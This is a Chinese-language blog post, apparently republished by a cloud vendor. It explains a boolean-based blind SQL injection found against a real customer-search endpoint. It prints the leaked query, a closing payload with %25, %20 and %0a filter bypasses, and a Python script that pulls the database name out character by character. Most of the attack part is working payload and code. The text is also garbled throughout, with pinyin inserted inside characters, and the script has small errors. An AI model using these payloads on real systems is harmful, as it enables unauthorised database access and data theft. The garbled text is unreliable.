如何進(jìn)行布爾型盲注的PY交易分析

今天就跟大家聊聊有關(guān)如何進(jìn)行布爾型盲注的PY交易分析，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

經(jīng)過(guò)上一篇的良好反饋，我正好在項(xiàng)目中發(fā)現(xiàn)了這個(gè)布爾型漏洞，就編寫了本篇文章，主體格式一樣，但內(nèi)容針對(duì)不同，下次看看在弄個(gè)什么的PY交易好，讓我再想想。

確定問(wèn)題點(diǎn)

在這次的測(cè)試過(guò)程中發(fā)現(xiàn)了一個(gè)注入點(diǎn)，通過(guò)測(cè)試發(fā)現(xiàn)返回包內(nèi)包含了sql語(yǔ)句，確認(rèn)可以注入，開始了這次的注入嘗試。

首先我們可以確認(rèn)這是一個(gè)GET型數(shù)據(jù)調(diào)用，本以為是簡(jiǎn)單的報(bào)錯(cuò)注入，應(yīng)該可以直接利用sqlmap進(jìn)行漏洞的利用，但現(xiàn)實(shí)狠狠的給了我一個(gè)耳光。sqlmap根本法利用這個(gè)漏洞，但返回的數(shù)據(jù)包中實(shí)打?qū)嵆霈F(xiàn)我數(shù)據(jù)庫(kù)語(yǔ)句，所以我把返回的數(shù)據(jù)庫(kù)語(yǔ)句拿出來(lái)，開始了一點(diǎn)點(diǎn)的構(gòu)造進(jìn)程。

復(fù)制出來(lái)的數(shù)據(jù)庫(kù)語(yǔ)句：

SELECT count(0) FROM customer c WHERE c.dealership_id = ? AND c.active = true AND (c.full_name LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub1 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub2 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%')

二、測(cè)試命令語(yǔ)句

經(jīng)過(guò)實(shí)驗(yàn)，發(fā)現(xiàn)報(bào)錯(cuò)內(nèi)容不同，可說(shuō)明與參數(shù)確實(shí)可以影響數(shù)據(jù)庫(kù)語(yǔ)句。但返回的內(nèi)容需要進(jìn)行閉合而且返回內(nèi)容不可以利用，所以可以排除報(bào)錯(cuò)等類型注入形式，可以探測(cè)的注入類型就僅剩下兩種了：時(shí)間型盲注，布爾型盲注直接在目標(biāo)后加入測(cè)試語(yǔ)句。

構(gòu)造數(shù)據(jù)庫(kù)語(yǔ)句：

%'){測(cè)試語(yǔ)句}AND(c. full_name like '%test

返回成功，實(shí)現(xiàn)語(yǔ)句閉合（此外利用了數(shù)據(jù)庫(kù)模糊查詢like %%）,在測(cè)試過(guò)種發(fā)現(xiàn)存在過(guò)濾，單獨(dú)%無(wú)法通過(guò)，空格無(wú)法通過(guò)，系統(tǒng)會(huì)返回404，針對(duì)之前爆出的數(shù)據(jù)庫(kù)語(yǔ)句，利用%25和%20繞過(guò)對(duì)對(duì)單獨(dú)%和空格的過(guò)濾構(gòu)造出以上的數(shù)據(jù)庫(kù)語(yǔ)句完成語(yǔ)句的閉合，成功返回200，確認(rèn)可以返回正常數(shù)據(jù)包，并可以根據(jù)數(shù)據(jù)庫(kù)語(yǔ)句的正確來(lái)進(jìn)行布爾型盲注測(cè)試。

接下來(lái)確認(rèn)測(cè)試語(yǔ)句

27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test

按位截取的形式進(jìn)行匹配，確認(rèn)數(shù)據(jù)庫(kù)名稱

三、工具思路

3.1 Post數(shù)據(jù)包利用

利用python的數(shù)據(jù)包發(fā)送來(lái)批量測(cè)試目標(biāo)內(nèi)容

和時(shí)間型盲注不同，布爾型盲注要根據(jù)返回?cái)?shù)據(jù)包的不同來(lái)確認(rèn)問(wèn)題

%0a(ascii(substr(database(),{1},1))={0})%0a

利用find函數(shù)來(lái)查找返回的數(shù)據(jù)特征，判斷是否成功得到注入數(shù)據(jù)

# coding:utf-8
import requests
import datetime
import time

headers = {
    頭信息，自己添加
}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@_.' 
database = ''
for j in range(1,11):
    for i in range(49,125):
        Url = 'https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx/find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test'
        UrlFormat = Url.format(i,j)      #format（）函數(shù)使用
        r = requests.get(UrlFormat,headers=headers)
        d = r.content.find("Test")       #利用find函數(shù)來(lái)查找返回的數(shù)據(jù)特征，判斷是否成功得到注入數(shù)據(jù)
        if d != -1:
            print(i)
            print chr(i)
            database += chr(i)
            print database
            break
        else:
            pass

四、以后的想法

對(duì)于代碼的未來(lái)，有如下的想法

1.加入數(shù)據(jù)包直接調(diào)用的功能

2.針對(duì)0值永真的修改

3.進(jìn)行線程上的優(yōu)化

4.編寫GET方法的代碼

5.進(jìn)行整體代碼的邏輯重構(gòu)（這個(gè)是吹NB）

看完上述內(nèi)容，你們對(duì)如何進(jìn)行布爾型盲注的PY交易分析有進(jìn)一步的了解嗎？如果還想了解更多知識(shí)或者相關(guān)內(nèi)容，請(qǐng)關(guān)注億速云行業(yè)資訊頻道，感謝大家的支持。